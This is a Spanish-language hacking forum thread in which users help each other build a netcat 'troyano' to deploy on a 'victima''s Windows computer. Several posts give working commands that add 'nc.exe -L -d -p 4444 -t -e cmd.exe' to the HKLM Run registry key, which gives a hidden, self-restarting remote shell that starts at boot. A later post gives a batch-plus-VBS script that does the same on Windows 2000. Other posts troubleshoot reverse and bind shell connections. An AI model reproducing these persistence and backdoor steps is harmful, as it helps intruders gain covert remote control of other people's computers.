WHK
+-=[Yan]=-+
|
D4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell. Eso significa que no puedes abrir tu puerto en forma pública, revisa tu router y esas cosas, también que no esté en uso ese puerto por otro programa o pc dentro de la misma red si usas router, verifica tu firewall ya que también algunos antivirus lo traen incorporado, etc... si puedes hacer inversa pero no directa es porque no se está abriendo el puerto sobre tu ip pública. En linux ya viene incorporado el netcat y si no es asi puede bajarse su código fuente y compilarlo ./configure make etc.
|
|
|
|
« Última modificación: 29 Diciembre 2007, 18:34 por WHK »
|
|
|
|
|
WHK
+-=[Yan]=-+
|
Ya reestablecí todas las imagenes de los primeros post.
|
|
|
|
|
|
|
|
|
Enzo87
|
D4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell. Eso significa que no puedes abrir tu puerto en forma pública, revisa tu router y esas cosas, también que no esté en uso ese puerto por otro programa o pc dentro de la misma red si usas router, verifica tu firewall ya que también algunos antivirus lo traen incorporado, etc... si puedes hacer inversa pero no directa es porque no se está abriendo el puerto sobre tu ip pública. En linux ya viene incorporado el netcat y si no es asi puede bajarse su código fuente y compilarlo ./configure make etc. Muchas gracias WHK. El puerto que uso es el 80, que ya debería estar abierto. Y sobre revisar el router, está complicado ya que mi ISP es Tele2 y son ellos los que acceden al router  De antivirus uso Antivir de Avira, que desactivé para hacer las pruebas y el cual no lleva Firewall. De firewall uso ZoneAlarm, y le di permisos al nc.
|
|
|
|
|
|
|
|
|
BBOYHACK
#Bboyhacks#
|
como podria hacer para incluir al netcat en las aplicaciones de inicio para cada ves que el equipo inicie se ative solo se que tendria que colocarlo aqui
(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)
pero como podria realizarlo desde (msdos) hay alguna forma
|
|
|
|
|
|
lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro: Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows
Blackhacking.no-ip.org
|
|
|
Novlucker
|
Desde ms-dos sería algo así REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOMBREQUEPREFIERAS /t REG_SZ /d RUTADETUBAT  Saludos
|
|
|
|
|
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein
|
|
|
BBOYHACK
#Bboyhacks#
|
Desde ms-dos sería algo así REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOMBREQUEPREFIERAS /t REG_SZ /d RUTADETUBAT  gracias ya lo pude incluir ahora cuando trato de incluirlo con un puerto ala escucha nada me da un error de error:demasiados parametros de linia de comando REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d C:nc.exe -l -p 4444 -t -e cmd.exe eso es lo que coloco
|
|
|
|
|
|
lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro: Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows
Blackhacking.no-ip.org
|
|
|
Maestro Oscuro
|
BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...
|
|
|
|
|
|
|
|
|
Novlucker
|
BBOYHACK, al escribir eso te toma como si "C:\nc.exe -l -p" y "4444" fuesen parametros separados, e igualmente ocurre con los que siguen. Intenta lo siguiente REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -p 4444 -t -e cmd.exe"  Saludos
|
|
|
|
« Última modificación: 07 Enero 2008, 06:16 por Novlucker »
|
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein
|
|
|
BBOYHACK
#Bboyhacks#
|
BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...
ok pero cual es tu problema en que parte del troyano tienes dudas dond te da el error
|
|
|
|
|
|
Blackhacking.no-ip.org
|
|
|
Novlucker
|
en la computadora de la victima sale que no es una aplicación valida de Win32 En tu computadora que sale?? supongo que lo mismo verdad?? Algunas veces esto ocurre porque luego de encriptarlo o cambiarle las imagenes el archivo queda dañado, y deja de funcionar. Saludos
|
|
|
|
|
|
|
|
|
BBOYHACK
#Bboyhacks#
|
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -p 4444 -t -e cmd.exe
ok perfecto ahora para que la ventana no salga cuando inicie le agrege la opcion -d
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -d -p 4444 -t -e cmd.exe
y perfeto no sale ninguna ventana de msdos ok aqui viene otra pregunta ahora si cierro el programa se cierra tambien tendria que esperar q la persona reiniciara el pc para que se pueda volver a cargar
como podria ponerlo que se ative cada cierto tiempo o algo así
|
|
|
|
« Última modificación: 07 Enero 2008, 08:30 por BBOYHACK »
|
|
Blackhacking.no-ip.org
|
|
|
BBOYHACK
#Bboyhacks#
|
bueno ya lo pude hacer pero voy a post aca eso tal ves alguien tenga tambien la duda para que cuando lo cierres se vuelva a cargar otra vez sin tener que reiniciar
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -L -d -p 4444 -t -e cmd.exe
si te fijais cambie solo la -l por -L de minuscula la puse en mayuscula...
|
|
|
|
|
|
Blackhacking.no-ip.org
|
|
|
Enzo87
|
Eso es porque has cambiado el icono a la version 1.1, prueba cambiandoselo a la versión 1.0. Busca por los primeros post y encontraras este tema solucionado. Saludos!!
|
|
|
|
|
|
|
|
|
BBOYHACK
#Bboyhacks#
|
amigo a ver si me pueden ayudar. tengo un pc y estoy tratando de agregar el netcat al inicio pero el equipo tiene es windows 2000 y no es el mismo comando que windows xp
con que comando lo puede agregar al inicio en windows 2000
|
|
|
|
|
|
Blackhacking.no-ip.org
|
|
|
Novlucker
|
En W2K no existe ningun comando que modifique el registro desde consola (ms-dos) Pero bueno, siempre hay que pensar que si no se encuentra una solución directa, al menos hay que encontrar una alternativa  Como comentaba, windows 2000 no trae el comando REG, pero lo que si trae es Windows Script Host (viene por defecto a partir de win 98  ) Para el que no sepa que es esto, le comento que es un lenguaje interpretado que permite crear archivos por lotes (como los bat) más complejo. Entre sus posibilidades está la de modificar el registro, y al ser interpretado, basta con volcar su codigo en un "archivo de texto", y cambiarle la extensión a *.vbs Pero bueno, pasando ahora si al problema de BBOYHACK, he aquí el codigo *.bat que crea este *.vbs echo set objshel = createobject("wscript.shell") >> c:\registro.vbs echo objshel.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NC", "C:\nc.exe -L -d -p 4444 -t -e cmd.exe", "REG_SZ" >> c:\registro.vbs start c:\registro.vbs
Al visualizarlo en pantalla el codigo queda algo entrecortado (igualmente creo esta bastante claro), así que por las dudas aclaro. Línea 1 - - - - -> echo set.........Línea 2 - - - - -> echo objshel...Linea 3 - - - - -> start ..............Espero te sirva  Saludos
|
|
|
|
« Última modificación: 18 Enero 2008, 23:35 por Novlucker »
|
|
|
|
|
|